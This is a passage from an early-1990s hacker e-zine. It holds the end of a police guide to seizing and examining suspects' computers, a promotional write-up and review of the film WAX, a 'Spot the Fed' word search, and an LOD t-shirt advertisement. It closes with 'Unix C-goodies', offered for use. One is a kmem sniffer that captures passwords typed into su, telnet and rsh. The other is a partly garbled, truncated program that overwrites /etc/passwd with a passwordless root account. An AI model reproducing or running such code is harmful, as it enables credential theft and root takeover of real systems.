  2198.               e. Occupations and employers of suspects and other
  2199.                  people on the premises.
  2200.  
  2201.         C. Surveillance of computer facilities
  2202.  
  2203.         D. Pen register or dialed-number recorder (DNR):
  2204.  
  2205.           1. If telephone access codes are being abused, use pen
  2206.              registers or DNRs to gather documentation. Frequently,
  2207.              a prosecutable case is made through the application of
  2208.              this technique alone.
  2209.  
  2210.           2. Use this technique to obtain additional criminal
  2211.              intelligence on additional suspects, target computer 
  2212.              systems, and the extent of computer use.
  2213.  
  2214.         E. Undercover computer communications with targeted system
  2215.            and suspects:
  2216.  
  2217.           1. Consider setting up an electronic bulletin board operation
  2218.              or attractive host computer that the suspect can access or
  2219.              attack. However, this method is costly and requires a 
  2220.              substantial commitment of personnel to monitor the 
  2221.              operation.
  2222.  
  2223.           2. If the suspect maintains his own electronic bulletin board, 
  2224.              consider the feasibility of using a computer to gain
  2225.              access to his system within the provisions of the    
  2226.              Electronic Communications Privacy Act of 1986 (PL 99-508).
  2227.              Frequently,suspects allow others to access their systems,      
  2228.              which may contain unauthorized credit card information,  
  2229.              hacking data, and access code files. Consider consensual 
  2230.              use of an informant's access to the suspect's computer 
  2231.              system.
  2232.  
  2233.         F. Monitoring of computer transmissions
  2234.  
  2235.         G. False computer data base entries as an investigative tool:
  2236.  
  2237.           1. Credit bureaus and credit card issuers frequently allow
  2238.              false information to be "planted" in their data bases for
  2239.              law enforcement use.
  2240.  
  2241.           2. If the suspect uses this information, the investigator
  2242.              can collect evidence through computer audit trails.
  2243.  
  2244. II. Supplies Needed to Execute a Search of a Personal Computer Site
  2245.  
  2246.        A. Diskettes or portable data storage units:
  2247.  
  2248.           1. Be prepared to copy files for temporary storage unto
  2249.              5-1/4", 3-1/2", or 8" diskettes. Up to 100 diskettes
  2250.              may be needed for large storage devices of 50 megabytes
  2251.              or more. Diskettes should be preformatted to avoid
  2252.              contamination when the suspect's computer is used.
  2253.  
  2254.           2. Have a sufficient supply of tape cartridges. Some 
  2255.              compute systems include cartridge-tape decks used 
  2256.              for mass storage backup of hard disk information 
  2257.              or individual program storage.
  2258.  
  2259.           3. Have plenty of evidence tape, adhesive labels, or some
  2260.              other means of write protecting the disks.
  2261.  
  2262.           4. Have a set of utility computer programs for target
  2263.              computers to retrieve data files.
  2264.  
  2265.        B. Adhesive colored labels for use in identifying and
  2266.           cataloging evidence (usually supplied with new diskettes):
  2267.  
  2268.          1. Place labels on diskette copies specifying the access 
  2269.             commands,the operating system name in which the disk is 
  2270.             formatted, perhaps the program application used to create 
  2271.             the data, and the case or file number of the investigation.
  2272.  
  2273.          2. These labels are distinctly different from evidence labels
  2274.             d suspect is cooperative and identifies diskettes 
  2275.               containing incriminating information, write protect them,
  2276.               then review them on site, and print one or two of the
  2277.               incriminating files. At this point, print only enough
  2278.               to establish the basis for the violation. If several
  2279.               diskettes are to be examined, label them appropriately.
  2280.  
  2281.            2. If the suspect is not cooperative, attempt to identify
  2282.               diskettes that may contain incriminating information by 
  2283.               examining the suspect's diskette labels. If the 
  2284.               questionable diskettes are located, write protect them
  2285.               and print the directory of each diskette, and the contents
  2286.               of a questionable file. Again, if a number of diskettes 
  2287.               are to be examined, label them.
  2288.  
  2289.            3. Show the printout to the suspect, after he has been 
  2290.               properly advised of his rights, for possible use in 
  2291.               obtaining a confession.
  2292.  
  2293.            4. If no further review of the diskettes is nessecary on site
  2294.               assemble and secure computer programs and documentation
  2295.               (much of it may be pirated) for inventory and transport to
  2296.               a storage site.
  2297.  
  2298.         D. Label the cables connecting various devices to aid in the
  2299.            reassembly of the system at a later time.
  2300.  
  2301.         E. Photograph the labeled equipment and cables.
  2302.  
  2303.         F. Disassemble, tag, and inventory the equipment.
  2304.  
  2305.         G. Carefully pack seized devices in suitable containers for         
  2306.            transport.
  2307.  
  2308. VI Reassembling System at a Remote Location
  2309.  
  2310.         A. Write-protect all diskettes prior to review, which preserves
  2311.            the integrity of the evidence examination process and 
  2312.            prevents erasing or accidental damage to information on the 
  2313.            seized diskettes during the review process.
  2314.  
  2315.         B. Review all seized diskettes.
  2316.  
  2317.            1. Create a diskette log containing the following headings:
  2318.               "Diskette Number,""Contents," and "Disposition."
  2319.  
  2320.            2. Using colored adhesive labels, label each diskette with
  2321.               a letter of the alphabet, followed by a numeral 
  2322.               sequentially assigned to each diskette reviewed
  2323.               (e.g., a-1.a-2.a-3). The letter could correspond
  2324.               to the room where the diskette was located, or it
  2325.               may correspond to one of many suspects in a case,
  2326.               for example. 
  2327.  
  2328.            3. Review each diskette and enter its assigned number on the 
  2329.               diskette log.
  2330.  
  2331.            4. Under the "Contents" column of the log, briefly describe 
  2332.               the diskette contents (e.g., games,credit card 
  2333.               information, access code files).
  2334.  
  2335.            5. Print a directory of the diskette and label the printout 
  2336.               with an adhesive label bearing the same alphanumeric 
  2337.               designation as the diskette.
  2338.  
  2339.            6. Determine from the directory which files listed are to be
  2340.               reviewed.
  2341.  
  2342.            7. Review questionable files for incriminating information
  2343.               or copyright violations.
  2344.  
  2345.            8. If incriminating information is located, print the file
  2346.               contents and label the printout with an adhesive label
  2347.               bearing the same alphanumeric designation as the diskette
  2348.               and the directory printout.
  2349.  
  2350.            9. Copy the incriminating files onto a formatted blank 
  2351.               diskette established by the reviewing person specifically 
  2352.               for that purpose. Label it appropriately as a copy for 
  2353.               backup purposes.
  2354.  
  2355.           10. Enter in the "Disposition" column of the diskette log the
  2356.               action taken with respect to the diskette (e.g., directory 
  2357.               printed,files printed, incriminating information obtained,
  2358.               file copied).
  2359.  
  2360.           11. Do not be in a hurry. Although extremely time consuming 
  2361.               and tedious, this process is essential for preserving 
  2362.               evidence and locating it easily during a court case.
  2363.  
  2364.         C. Review printouts seized on site and those printed from review 
  2365.            of computerized information to determine the appropriate 
  2366.            investigative follow-up
  2367.  
  2368.         D. Store original diskettes in a safe location, free from  
  2369.            magnetic fields, excessive humidity, or severe temperatures.
  2370.  
  2371.         E. If the suspect has placed the information on the diskette 
  2372.            using some type of commercial program package 
  2373.            (e.g., D-base III, Lotus), copy the target or incriminating 
  2374.            file onto a separate diskette.Then, and only then, should any 
  2375.            attempt be made to manipulate the information in the file to 
  2376.            a readable or usable format.Even then, the copy of the file 
  2377.            should be used and not the original data.
  2378.  
  2379.        F. Some of the suspect's critical files may be encrypted, which
  2380.           would be shown a strings of meaningless characters. If so, 
  2381.           attempt to locate the encryption program or security plug-in 
  2382.           circuit board and description manuals. Attempting to break the 
  2383.           code without the key will be fruitless unless the crypto-
  2384.           algorithm is extremely simple. If the most well known crypto 
  2385.           algorithm DES (Digital Encryption Standard) was used and a  
  2386.           clear text and a matching encrypted text is available where 
  2387.           the secret key was used, a competent cryptoanalyst could 
  2388.           discover the key using several hours of a Cray 2 computer (the 
  2389.           fastest available) but at a great expense.
  2390.  
  2391.        G. File subdirectories and files may be stored in a "hidden" 
  2392.           status or "erased" but still present on the disk. Use 
  2393.           commercial utility programs that can search for and obtain 
  2394.           files of this nature.
  2395.  
  2396.  
  2397. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2398.  
  2399.  
  2400.              "WAX or the discovery of television among the bees" 
  2401.  
  2402. This is information on a new full length film created with new techniques
  2403. destined to make it a pilot for a new breed of cyber-cinema.  It was
  2404. contributed by the film's creator, David Blair.
  2405.  
  2406.  
  2407. CONTACT:
  2408. David Blair 
  2409. P.O. Box 174, Cooper Station, New York, NY 10276   
  2410. (212) 228 1514
  2411.  
  2412.      "WAX or the discovery of television among the bees" is set in Alamogordo,
  2413. New Mexico (1983), where the main character, Jacob Maker, designs gunsight
  2414. displays at a flight simulation factory.  Jacob also keeps bees.  His hives are
  2415. filled with "Mesopotamian" bees that he has inherited from his grandfather.
  2416. Through these bees, the dead of the future begin to appear, introducing Jacob
  2417. to a type of destiny that pushes him away from the normal world, enveloping him
  2418. in a grotesque miasma of past and synthetic realities.  The bees show Jacob the
  2419. story of his grandfather's acquisition and fatal association with the
  2420. "Mesopotamian" bees, in the years following the First World War.  The bees also
  2421. lead Jacob away from his home, out to the Alamogordo desert, slowly revealing
  2422. to him their synthetic/mechanical world, which exists in a darkness beyond the
  2423. haze of his own thoughts.  Passing through Trinity Site, birthplace of the
  2424. Plutonium bomb, Jacob arrives at a gigantic cave beneath the desert.  There, he
  2425. enters the odd world of the bees, and fulfills his destiny.  Traveling both to
  2426. the past and the future, Jacob ends at Basra, Iraq, in the year 1991, where he
  2427. meets a victim that he must kill.
  2428.  
  2429.      Independently executed over six years, "WAX or the discovery of television
  2430. among the bees" combines compelling narrative, in the realistic/fantastic vein
  2431. of Thomas Pynchon or Salman Rushdie, with the graphic fluidity of video
  2432. technique.  The result is an odd, new type of story experience, where smooth
  2433. and sudden transpositions of picture and sound can nimbly follow and fuse with
  2434. fantastical, suddenly changing, and often accelerated narrative.  The result
  2435. resembles story-telling in animated film.  Yet location photography and archive
  2436. research form the backbone of the piece.
  2437.  
  2438.      "WAX or the discovery of television among the bees" (85:00, mono) provides
  2439. an example of a new type of independent "electronic cinema" that will become
  2440. more common as the 1990's progress.
  2441.  
  2442. Review for 
  2443. "WAX or the discovery of television among the bees" 
  2444.  
  2445. from the magazine "MONDO 2000"
  2446. (to be printed in Volume 7 in August 1992)
  2447. article by Richard Kadrey
  2448.  
  2449.         Throughout the history of the film biz there have been occasional
  2450. attempts to shoot whole novels.  The silent era gave us Greed, a 12-hour
  2451. misery-fest that was ultimately chopped up and sold as guitar picks by the
  2452. studio heads.  Fassbinder was more successful with his 15-hour Berlin
  2453. Alexanderplatz, but that was shown in installments on TV, so the accumulation
  2454. of action and information was greatly diminished.
  2455.  
  2456.         In the literary world, J.G.  Ballard experimented with "condensed
  2457. novels" in his book The Atrocity Exhibition.  The idea was to boil away all
  2458. character and plot and leave just the steaming residue of motive, action and
  2459. response, to create the cumulative effect of novel-like density in just a few
  2460. pages.
  2461.  
  2462.         David Blair's video, WAX or the Discovery of Television Among the Bees,
  2463. is sort of a combination of these earlier experiments, and yet is something
  2464. wholly new.  Through a combination of archival film footage, new video and
  2465. computer animation WAX achieves the effect of a novel (density, the passage of
  2466. time, dramatic changes in character), and it does so in the 85 minute
  2467. running-time of a regular feature film.
  2468.  
  2469.         It's almost impossible to describe the plot of WAX; it's a Zen koan
  2470. told as a Burroughs cut-up.  We open with experimental cinematographer James
  2471. Maker, a member of the Supernormal Film Society who accompanies a British Royal
  2472. expedition to Antarctica in hopes of filming the spirits of the dead.
  2473. Flashfoward to James Maker's grandson, Jacob Maker, a computer programmer
  2474. working on targeting systems for the Air Force at their Alamagordo test range.
  2475. Jacob keeps bees, the bees that once belonged to his father and grandfather, a
  2476. semi-famous keeper of bees himself, friend of the man who first imported
  2477. Mesopotamian bees to England.  Jacob grows unsure of the work he is doing for
  2478. the Air Force, telling us that "To hit a simulated target was to prepare murder
  2479. against a real target." As his uncertainty grows, he spends more and more time
  2480. with the bees.  He has blackouts; time turns liquid, and he loses hours at a
  2481. time.  The hives are endlessly fascinating to him.  And then one day, he thinks
  2482. he can hear voices speaking to him from inside the hives.  .  .  .
  2483.  
  2484.         After that, Jacob quickly leaves behind almost everything we would
  2485. consider normal life and embarks on a Ballardian quest that takes him from his
  2486. home in Alamagordo, to Trinity site (location of the first nuclear bomb was
  2487. detonation, coincidentally on the day of Jacob's birth), to the underground
  2488. lair that is the real home of the bees (where the bees commune with the dead,
  2489. and prepare new bodies for them), to the Land of the Dead itself and to Iraq
  2490. during the Gulf War where Jacob is reborn briefly as a bomb, guiding himself
  2491. with the same targeting system he worked on back when he was a programmer.
  2492.  
  2493.         Blair labored for six years to finish WAX, working when he could from
  2494. grant to grant, scrounging and convincing people to contribute to the project
  2495. through the force of his vision, the strength of which is evident in the
  2496. extraordinary production quality of WAX.  The scenes set in Alamagordo and
  2497. Trinity Site were really filmed at those locations.  Blair convinced the Air
  2498. Force to let him take his video crew deep inside the highly restricted WSMR
  2499. bomb range.  On the day Blair and company were shooting, a celebration was on
  2500. nearby, an annual party marking the anniversary of the first nuclear bomb test.
  2501. Technicians set off a small chemical explosive, sending up a tall, white
  2502. mushroom cloud, a moment captured by chance by cinematographer Mark Kaplan, and
  2503. incorporated by Blair into the finished film.  Stealth bombers practiced bomb
  2504. runs over the shooting site, using the Trinity marker as ground zero on their
  2505. targeting grids-- Blair and his crew were being virtually bombed the whole time
  2506. they were filming.
  2507.  
  2508.         Another striking sequence in WAX is the underground cavern where the
  2509. bees make wax bodies for the dead to inhabit.  Blair shot these scenes in
  2510. off-limit locations inside Carlsbad Caverns, conning and cajoling his way into
  2511. sectors of cave that even the park rangers generally avoid.  It's during this
  2512. act that Jacob enters the Land of the Dead, and the audience gets a tour of the
  2513. afterlife via Florence Ormezzano's lovely computer graphics.  WAX neatly avoids
  2514. the problems of mainstream films like Lawnmower Man where films and effects
  2515. live and die by their flash quotient.  WAX refuses to compete with Hollywood's
  2516. ideas of special effects.  The computer images we get are startling, from the
  2517. bat-winged and multi-skulled spirit guide to the biomorphic squiggles that are
  2518. the alphabet of the dead.  These are dream images from a lost digital tribe,
  2519. pixelated runes and hieroglyphs.  Imagine what the Maya might have left behind
  2520. if they had vanished into a virtual world instead of the Mexican jungle.
  2521.  
  2522.         WAX is the first generation of a new video-based artform that Blair
  2523. calls is "independent electronic cinema." Like home-recording studios and the
  2524. zine world (like the zine you hold in your hands) recent advances in technology
  2525. have put powerful editing tools into the hands of anyone with the need and
  2526. desire to use them.  WAX was assembled using the Montage Picture Processor, a
  2527. relatively new "non-linear" video editing system, which allowed Blair to work
  2528. quickly and intuitively, digitally cutting and pasting the work together from
  2529. as many as six video segments at once.
  2530.  
  2531.         Both Blair and WAX, however, are having to pay a price for their
  2532. ambition.  Nobody wants to show or distribute WAX.  The art video crowd has
  2533. rejected it because it's too long and too expensive, a PC no-no.  The film
  2534. community is strictly hands-off because WAX is video-based.  This is almost
  2535. always the fate of the new.  Tuxedoed and tiaraed royals rioted at the premier
  2536. of the Rite of Spring.  Henry Miller, Allen Ginsberg and Burroughs were all
  2537. banned at one time for obscenity.  And the Elvis was shot from the waist up
  2538. because white boys weren't supposed to move like that.
  2539.  
  2540.         And who can really blame the critics?  The New is always frightening.
  2541. It makes you look at everything, your own work included, in a different way.
  2542. It makes you question your methods, your ideas, all your assumptions.  Worse,
  2543. the New can make you feel old, and when you're in art, where coolness and
  2544. affect are half the game, old is not where the beautiful people are hanging
  2545. out.
  2546.  
  2547.         Blair is optimistic, though.  With praise from the likes of William
  2548. Gibson, he knows that he accomplished want he set out to do.  He's already at
  2549. work on a new feature, an alternate history piece linking the fate of the
  2550. modern Japanese and Jews in an alternate Israel located in Manchuria.  Not
  2551. exactly the kind of material destined to give Terminator 9 a run for its money,
  2552. but Blair is playing in a different league, where film has the density of a
  2553. novel, where new thoughts are always welcome and where memories, dreams and
  2554. desires are as close as your skin, and as dangerous as a smart bomb.
  2555.  
  2556. TECHNICAL PROFILE:
  2557.  
  2558.         "WAX or the discovery of television among the bees" demonstrates the
  2559. narrative and visual forms that are emerging as the wide availability of new
  2560. technologies make possible an independent "electronic cinema".  Though the
  2561. specific combination of story, production work, post-production work, and sound
  2562. design that make up "Wax..." are unique, there is no doubt that the increased
  2563. availability of the technologies used in this project will lead to the creation
  2564. of new ways of making feature- length narrative, at which time "Wax..." will
  2565. become an example of a type, rather than an idiosyncratic phenomena.
  2566.  
  2567. ELECTRONIC PRODUCTION:
  2568. High quality video production is already an established fact.  As has often
  2569. been noted, the ability to shoot cheaply allows a director the ability to
  2570. sketch out story ideas, even under the pressures of location production.
  2571.  
  2572. Over fifty hours of location material were recorded for "Wax...".  There were
  2573. three production periods, totalling twenty days, spread over three years.  The
  2574. location work included travel to the a sculpture garden in central Kansas, and
  2575. to a wide variety of locations in Southwestern New Mexico, including such
  2576. restricted areas as the White Sands Missile Range, and the Carlsbad Caverns.
  2577.  
  2578. The ease of video duplication aided in stock footage collection.
  2579. In addition, small format video allowed the collection of archive
  2580. footage during travel.
  2581.  
  2582. ELECTRONIC POST-PRODUCTION: NON-LINEAR EDITING
  2583. The mass of material collected during video production and created during video
  2584. and computer effects work (see below) is difficult to organize and edit.  This
  2585. bottle-neck was overcome by the extensive use of non-linear editing during
  2586. off-line.  "WAX or the discovery of television among the bees" is the first
  2587. long- form independent production to fully exploit the capacities of this new
  2588. technology.
  2589.  
  2590. Organization of production material began early on at Film/Video Arts, a
  2591. non-profit media access center in NYC, where simple 3/4" editing equipment was
  2592. used.  This work was shifted home when, in the course of the production,
  2593. inexpensive home editing equipment became available.  A thermal video printer
  2594. allowed simple sorting and cataloguing of shots.
  2595.  
  2596. After the final shoot, all organized material was input to a Montage non-linear
  2597. editing system, where the real work of off- line editing began.  More than 1800
  2598. hours were spent on this system.
  2599.  
  2600. Non-linear editing allows an editor to instantly rearrange, trim or lengthen
  2601. all shots within a sequence, while previewing simple opticals.  On such a
  2602. system, a director can work at the levels of shot, sequence, and scene
  2603. simultaneously, allowing both the complete exploitation of large amounts of
  2604. production material, and the opportunity for associative patterning at all
  2605. levels.  Off-line editing acquires both the speed and creative flexibility of
  2606. writing.  "WAX or the discovery of television among the bees" is a clear
  2607. example of this new functionality.
  2608.  
  2609. ELECTRONIC POST-PRODUCTION:  VIDEO GRAPHICS/COMPUTER GRAPHICS
  2610. As is already obvious in short-form work such as the television commercial and
  2611. music video, the combination of electronic post- production with computer
  2612. graphics allows a director both complete control over production material, and
  2613. the ability to integrate this footage with completely synthetic material, in an
  2614. artificial graphic space.  "WAX or the discovery of television among the bees"
  2615. is the first independent production to harness these technologies for
  2616. fiction-feature storytelling.
  2617.  
  2618. Effects production began simultaneous with the initial production and editing
  2619. work.  More than forty hours of processed material were recorded, using a wide
  2620. variety of image processing and image synthesis techniques.  These ranged from
  2621. frame-based PC work, both 2-D and 3-D, to the real-time work, initially
  2622. executed on analog voltage-control systems at the Experimental Television
  2623. Center in Owego, N.Y.
  2624.  
  2625. Of special interest is the fact that a simple Amiga-based system was used to
  2626. create over 90 minutes of 3-D animated elements.  In the final tape, there are
  2627. several long sequences of narrative 3-D animation, totalling almost ten
  2628. minutes.
  2629.  
  2630. Both the PC work, analog work, and the majority of the production material were
  2631. fed through a real-time 2-D/3-D joy- stick controlled, key-frame based device
  2632. called Impact, from Microtime.  The machine was loaned to the production by the
  2633. manufacturer for 24 days, and installed at Film/Video Arts, NY.  The
  2634. extraordinary plastic qualities of this easily programmed device provided,
  2635. within the shot, the same compositional flexibility that the non-linear editing
  2636. system provided across shots.
  2637.  
  2638. ELECTRONIC POST-PRODUCTION: MUSIC
  2639. At the completion of editing, the finished picture was given to the composers,
  2640. devoid of any production or stock sound.  All eighty-five minutes of sound were
  2641. created from scratch by the pair, using samplers and other computer-based
  2642. instruments at their PC-automated audio-for-video studio.  The inexpensive, yet
  2643. powerful, technologies of contemporary music allow the independent
  2644. composer/sound designer to create long-form works with a speed and
  2645. sophistication previously not possible.
  2646.  
  2647. INDEPENDENT "ELECTRONIC CINEMA"
  2648. At the current time, "WAX or the discovery of television among the bees" is an
  2649. unusual, perhaps idiosyncratic project, in the style, content, and length of
  2650. its' narrative, and in its' visual composition.  However, these elements have
  2651. proceeded in unity with, and in many cases have been born from, the technical
  2652. aspects of its construction.  It should be noted that, as the 1990's progress,
  2653. real-time 2-D and 3-D image processing and synthesis will become available in
  2654. affordable desktop computers.  Inexpensive non-linear, PC-based editing systems
  2655. will replace cassette-based, mechanical systems.  These new technologies,
  2656. combined with the already established practices of video production and
  2657. PC-based electronic music, will be the material basis for a new "electronic
  2658. cinema".  As a wide range of producers gain the ability to investigate this
  2659. possibility, what is unusual here may become common.
  2660.  
  2661. Distribution for "WAX or the discovery of television among the bees" is planned
  2662. both on tape and on film.
  2663.  
  2664.  
  2665.  
  2666. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2667.           
  2668.  
  2669.  
  2670.  
  2671.  
  2672.  
  2673.                     /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
  2674.                     -/-                                 -/-
  2675.                     /-/         *> TID-BYTES <*         /-/
  2676.                     -/-                                 -/-
  2677.                     /-/     by the Informatik Staff     /-/
  2678.                     -/-                                 -/-
  2679.                     /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
  2680.  
  2681.      Tid-Bytes is a standing column of miscellaneous bits of information.
  2682.  
  2683. This issue brings us a wordhunt, more info on those LOD t-shirts, and some
  2684. C-programs that I am sure will be of use to you Unix explorers.
  2685.  
  2686.  
  2687. "Spot the Fed!"
  2688. -by the staff- 
  2689.  
  2690. Hiding out below are all sorts of undesirables.  Search behind every two-way
  2691. mirror, potted plant, and light fixture (as well as diagonally, backwards, and
  2692. forwards) to locate them and the other terms listed below.  [Thanks to KL, TK,
  2693. Vodka, Holistic, and everyone else...]
  2694.  
  2695. Wordlist
  2696. ~~~~~~~
  2697.  
  2698. Klupfel      - Henry Klupfel, Bellcore
  2699. Ames         - Toni Ames, our buddy at Sprint
  2700. Maxfield     - John Maxfield, in charge of several sting operations
  2701. Meola        - Ralph Meola, AT&T
  2702. Foley        - Tim Foley, Secret Service
  2703. Delaney      - Donald Delaney, New York State Police, senior investigator
  2704. Clifford     - Cliff Stoll, the cukoo, easy to spot, look for the hair
  2705. Geraldo      - Geraldo Rivera, some sort of alien plague
  2706. Dale         - Dale Drew, Tymnet Security
  2707. Thackeray    - Gail Thackeray, Arizona prosecuter
  2708. Cook         - William Cook, (ex)US prosecutor
  2709. Parker       - Don Parker, security consultant
  2710. CERT         - The Computer Emergency Response Team
  2711. Patrick      - Patrick Farmer, Visionary, High-level informant
  2712. BellCore     - bringing us new technology to explore
  2713. Sprint       - Always tough
  2714. ATANDT       - AT&T, quality you can depend on
  2715. confiscation - the game the feds are playing when they take your stereo away
  2716. RedBox       - discount payphone device
  2717. informer     - a narc, not a real popular buddy
  2718. phreak       - a telecom enthusiast
  2719. probation    - What you hope you get
  2720. jailtime     - What you hope NOT to get
  2721. sting        - a setup, the reason you don't leave your real info
  2722. raid         - a friendly wakeup call
  2723. busted       - gone down in history
  2724. arrest       - you get to ride in a police car!
  2725. fraud        - just a white lie
  2726. hacker       - the root of all evil
  2727. warrant      - "Warrant? We don't need no stinking warrants..."
  2728. magnum       - popular device used to hold dangerous hackers at bay
  2729. police       - do I smell bacon?
  2730. agents       - friendly guys that don't know anything but have nice sunglasses
  2731. feds         - big brother's helpers
  2732. officers     - they protect and serve
  2733. SunDevil     - The infamous operation Sun-Devil
  2734. Zardoz       - CERT advisory compilations
  2735. cracker      - politically correct term for hacker
  2736.  
  2737.  
  2738.                       ___________________________________
  2739.                       |                                 |
  2740.                       |          Spot The Fed!          |
  2741.                       |                                 |
  2742.                       +---------------------------------+
  2743.                       |                                 |
  2744.                       |  t t m a g e n t s b a t y w m  |
  2745.                       |  r d d i e s m a g n u m n a e  |
  2746.                       |  s c d n r g n i t s d s e t o  |
  2747.                       |  p a e r a k n y n r d a t s l  |
  2748.                       |  r n l l l t e d a s e e p e a  |
  2749.                       |  i o a r d l a l r j a k f r d  |
  2750.                       |  n i n f o r m e r a d p c r r  |
  2751.                       |  t t e f e e c i a i u e o a s  |
  2752.                       |  h a y c o i r f w l r f d s h  |
  2753.                       |  a b o u f f a x k t f k u o p  |
  2754.                       |  c o n f i s c a t i o n a h a  |
  2755.                       |  k r o d e r k m l m d c r o y  |
  2756.                       |  e p o l i c e c r e i e f d r  |
  2757.                       |  r p a r k e r b v z a r d o z  |
  2758.                       |  a d a p a t r i c k r m c r c  |
  2759.                       |  y c i b e l l c o r e d b o x  |
  2760.                       |                                 |
  2761.                       +---------------------------------+
  2762.  
  2763.  
  2764.  
  2765.  
  2766.  
  2767.  
  2768. ---------------------
  2769.  
  2770. LOD Shirts
  2771. by Erik Bloodaxe
  2772.  
  2773. With all the amazing hullabaloo going on in several newsgroups and throughout
  2774. the electronic community as a whole, I have decided to go ahead and make one
  2775. more, FINAL, print run on the LOD t-shirts.
  2776.  
  2777. Please, if anyone is interested, have your mail sent by the end of July, so
  2778. everyone who wants one can get one this time.  I thought that in the 6 print
  2779. orders I made previously "Everyone" who wanted one got one, but from the
  2780. requests I have received apparently not.
  2781.  
  2782. I was amazed at the orders that came in from locations such as Hong Kong,
  2783. England, Netherlands and Australia.  The list of luminaries who came out of the
  2784. woodwork with an interest in such item was equally as impressive, security
  2785. types at LLNL, government employees, hackers from the golden days, and even a
  2786. certain regular contributor to a few "not for normal distribution" mail lists.
  2787.  
  2788. This run is for those of you who got left out.  Again, I urge that you respond
  2789. before July 31, as that is when it the opportunity ends forever.
  2790.  
  2791. Blatant promotion follows:
  2792.  
  2793. "LEGION OF DOOM--INTERNET WORLD TOUR" T-SHIRTS!
  2794.  
  2795. Now you too can own an official Legion of Doom T-shirt.  This is the same shirt
  2796. that sold-out rapidly at the "Cyberview" hackers conference in St.  Louis.
  2797. Join the other proud owners such as Lotus founder Mitch Kapor and award-winning
  2798. author Bruce Sterling by adding this collector's item to your wardrobe.  This
  2799. professionally made, 100 percent cotton shirt is printed on both front and
  2800. back.  The front displays "Legion of Doom Internet World Tour" as well as a
  2801. sword and telephone intersecting the planet earth, skull-and-crossbones style.
  2802. The back displays the words "Hacking for Jesus" as well as a substantial list
  2803. of "tour-stops" (internet sites) and a quote from Aleister Crowley.  This
  2804. T-shirt is sold only as a novelty item, and is in no way attempting to glorify
  2805. computer crime.
  2806.  
  2807. Shirts are only $15.00, postage included!  Overseas add an additional $5.00.
  2808. Send check or money-order (No CODs, cash or credit cards--evenrd) made payable
  2809. to Chris Goggans to:
  2810.  
  2811.                    Chris Goggans
  2812.                    5620 Glenmont #P-17
  2813.                    Houston, TX 77081
  2814.  
  2815.  
  2816.  
  2817. ---------------------
  2818.  
  2819.  
  2820. Unix C-goodies
  2821. from cdmorgan
  2822.  
  2823. For you *nix explorers out there, here's a couple of interesting programs for
  2824. you to look at.  They are untested, so have at it!
  2825.  
  2826.  
  2827. PROG1:
  2828.  
  2829. /* when run from a shell-escape in /bin/mail, this program is able to 
  2830.    read any password given to su, telnet, rsh by any user.  
  2831.    Works on Ultrix 4.0-4.2 with no mods */
  2832.  
  2833. #include <stdio.h>
  2834. #include <machine/pte.h>
  2835. #include <sys/param.h>
  2836. #include <sys/dir.h>
  2837. #include <sys/user.h>
  2838. #include <sys/proc.h>
  2839. #include <sys/conf.h>
  2840. #include <sys/tty.h>
  2841. #include <nlist.h>
  2842. #include <pwd.h>
  2843.  
  2844. static int kmem = -1, mem = -1 ;
  2845. struct nlist nlst[] = { { "_pt_tty" }, { NULL } } ;
  2846.  
  2847. init() {
  2848.    kmem = open("/dev/kmem",0) ;
  2849.    mem = open("/dev/mem", 0) ;
  2850. }
  2851.  
  2852. void getkval(unsigned long offset, int *ptr, int size)
  2853. {
  2854.    lseek(kmem, (long)offset, 0) ;
  2855.    read(kmem, (char *)ptr, size) ;
  2856. }
  2857.  
  2858. main()
  2859. {
  2860.    int tty, ntty=9, i, j, k, bytes, oleng=0 ;
  2861.    struct tty *tbase, *tt ;
  2862.    char ptr[4096], old[4096] ;
  2863.  
  2864.    init() ;
  2865.    (void) nlist("/vmunix", nlst) ;
  2866.    getkval(nlst[0].n_value, (int*)(&tty), sizeof(tty)) ;
  2867.    tbase = (struct tty*)malloc(bytes=ntty*sizeof(struct tty)) ;
  2868.    for (;;) {
  2869.       getkval(nlst[0].n_value, (int*)tbase, ntty*sizeof(struct tty)) ;
  2870.       for (j=0,tt=tbase;j<ntty;j++,tt++) {
  2871.          if (tt->t_rawq.c_cc) {
  2872.             getkval((unsigned long)tt->t_rawq.c_cf,(int*)ptr,tt->t_rawq.c_cc);
  2873.             if ((oleng>tt->t_rawq.c_cc)&&
  2874.                 (!strncmp(old,ptr,tt->t_rawq.c_cc))) {
  2875.                for(k=0;k<(oleng-tt->t_rawq.c_cc);k++) 
  2876.                   putchar(0x10) ;
  2877.                printf("\"") ;
  2878.             }
  2879.             else if (strncmp(old,ptr,oleng)||(oleng==0)) {
  2880.                printf("\n%5d (%1d) \"",tt->t_pgrp,i) ;
  2881.                for(i=0;i<tt->t_rawq.c_cc;i++) 
  2882.                     printf("%c",((ptr[i]<32) ? '.' : ptr[i])) ;
  2883.                printf("\"") ;
  2884.             }
  2885.             else if (strncmp(old,ptr,tt->t_rawq.c_cc)) {
  2886.                putchar(8) ;
  2887.                for(i=oleng;i<tt->t_rawq.c_cc;i++)
  2888.                     printf("%c",((ptr[i]<32) ? '.' : ptr[i])) ;
  2889.                printf("\"") ;
  2890.             }
  2891.             strncpy(old,ptr,oleng=tt->t_rawq.c_cc) ;
  2892.             fflush(stdout) ;
  2893.          }
  2894.       }
  2895.    }
  2896. }
  2897.  
  2898.  
  2899.  
  2900. PROG2:
  2901.  
  2902. /* This will overlay /etc/password with a string that emulates
  2903.    a root account with no password.  the first strlen(replacement-string)
  2904.    bytes will be overlayed */
  2905.  
  2906. #include <sys/types.h>
  2907. #include <sys/socket.h>
  2908. #include <sys/un.h>
  2909. #include <stdio.h>
  2910.  
  2911. struct sockaddr_un from = { AF_UNIX, "/dev/printer" };
  2912. char bufload[1024];
  2913. char buf[1024];
  2914.  
  2915. main(argc, argv)
  2916. char **argv;
  2917. {
  2918.         int fromfile, loadlen, count, s;
  2919.         unsigned char c;
  2920.  
  2921.        /* load up buffer with passwordless root account */
  2922.        sprintf(bufload, "root::0:1:Operating with no password:/:/bin/csh\nnobody:*:-2:-2:No Body:/:\n");
  2923.        loadlen=strlen(bufload);
  2924.  
  2925.     STREAM, 0)) < 0) {
  2926.                fprintf(stderr, "Error openning socket.\n");
  2927.                exit(1);
  2928.        }
  2929.        if(connect(s, &from, strlen(from.sun_path) + 2) < 0) {
